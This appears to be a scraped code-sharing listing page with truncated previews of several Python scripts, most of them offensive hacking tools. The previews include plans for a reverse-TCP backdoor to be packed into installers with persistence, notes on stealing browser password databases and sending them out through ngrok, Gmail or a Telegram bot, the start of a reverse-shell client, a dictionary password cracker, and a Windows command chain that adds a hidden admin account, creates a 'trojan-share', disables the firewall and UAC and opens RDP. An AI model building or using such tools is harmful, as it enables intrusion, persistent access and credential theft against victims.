This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # socket python browser | |
| # TODO : we can access to cookie on client side then why we just don't put some virus or backdoor in user cookie so everythime he/she try to load our site our virus run itself from cookie! our encoded jwt has some virus code(js/python/bytecode) with expiration date so when our user try to login this code will sign and we send its token along with the secret key to the client then on a specific time this token will decrypt. | |
| import socket | |
| import sys | |
| host = sys.argv[1] | |
| port = 80 # web |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # REF: https://msdn.microsoft.com/en-us/library/windows/desktop/aa384006(v=vs.85).aspx | |
| # REF: https://www.youtube.com/watch?v=8GVumPe57o4 | |
| # REF: http://www.pyinstaller.org/ | |
| # WARNING: for schedule n_minutes get help from Python_Reverse_TCP folder codes | |
| # TODO: convert client.py to base64 encdoe and exe file(using pyinstaller) -> above REF + pyherion.py file | |
| # TODO: inject exe file into any installaion package -> above youtube REF | |
| # TODO: schedule n_minutes in which forces victim to try to connect to attacker every n_minutes -> it's a meterpreter feature(persistence backdoor); alsoe see its REF | |
| # TODO: use argparser or sys.argv[] to get the ip and port from commandline if you want to use it with ngrok | |
| # TODO: test it with ngrok tcp protocol |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://null-byte.wonderhowto.com/how-to/grab-all-passwords-0163301/ | |
| # https://pastebin.com/LV2XPc2R, https://pastebin.com/sd5aqTez | |
| # use socket programming with ngrok to recv the dbs | |
| # u can use gmail also to recv dbs after you send them to your account | |
| # u can use telepot to send the dbs to your ICFU bot | |
| # u can use post-exploitation in msf to steal browser passwords | |
| # after choosing your way of doing this shity thing just make an exe file with tor icon from SnatchDB_C.py | |
| # the only important thing for us is Login Data or logins table u can get other info such as history and cookies using Snatch.py code | |
| ''' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import os | |
| import subprocess | |
| #1 | |
| target_host = "127.0.0.1" | |
| target_port = 8764 | |
| #2 | |
| client = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
| client.connect((target_host,target_port)) | |
| #3 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from socket import * | |
| import sys, time | |
| from datetime import datetime | |
| host = '' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import crypt | |
| def testPass(cryptPass): | |
| salt = cryptPass[0:2] | |
| dictFile = open('dictionary.txt' , 'r') | |
| for word in dictFile.readLines(): | |
| word = word.strip('\n') | |
| cryptWord = crypt.crypt(word,salt) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os, ctypes, sys | |
| # os.system("net user W%computername%O vocfu1203 /add && net localgroup administrators W%computername%O /add && mkdir C:\system-01 && cd system-01 && attrib system-01 +h && net share trojan-share$=C:\system-01 /grant:WO,full /grant:everyone,full && netsh firewall set service type = fileandprint mode = enable && netsh firewall set service type = remotedesktop mode = enable && netsh advfirewall firewall set rule group='remote desktop' new enable=Yes && netsh advfirewall firewall add rule name='Open Ports' dir=out action=allow protocol=TCP localport=8080-445-443-6777-3389 && reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections/t REG_DWORD /d0/f && netsh advfirewall set allprofile state off && reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f && ipconfig /all > C:\system-01\%computername%.txt && getmac > C:\system-01\%computername%.txt && net user > C:\system-01\%computername%.txt && po |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # STATUS : incomplete | |
| # http://www.32x8.com/index.html | |
| # https://www.youtube.com/watch?v=RO5alU6PpSU | |
| # https://realpython.com/primer-on-python-decorators/ | |
| # https://www.allaboutcircuits.com/textbook/digital/chpt-8/logic-simplification-karnaugh-maps/ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # build a httpserver like flask | |
| # python http webserver using http module(watch?v=hFNZ6kdBgO0) or socket module(watch?v=_najJkyK46g) or flask module(watch?v=vyCboBjK4us) or watch?v=2KeSfeIo2MI | |
| import socket # Networking support | |
| import signal # Signal support (server shutdown on signal receive) | |
| import time # Current time | |
| class Server: | |
| """ Class describing a simple HTTP server objects.""" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!python | |
| # coding: utf-8 | |
| ''' | |
| Designed By : | |
| β ββ βββ βββ βββββββ ββββββ ββββ β βββ ββββββ ββββ β | |
| βββ β βββββββββββ ββββ βββββββ βββ ββ ββ β ββββββββ βββ ββ ββ β | |
| βββ β ββ ββββββββ βββ ββββββ ββββββ ββ βββββββββββ ββββββ ββ βββ | |
| βββ β ββ ββββββββ ββββ ββββ βββββββ ββββββββββββ βββββββ βββββ | |
| ββββββββ βββββββββββββββββββ β βββββββββββ βββββββββ βββββββββββ βββ | |
| cRi3d on windows 10 using regedit >> by cL34n 3v3RytH!n9 |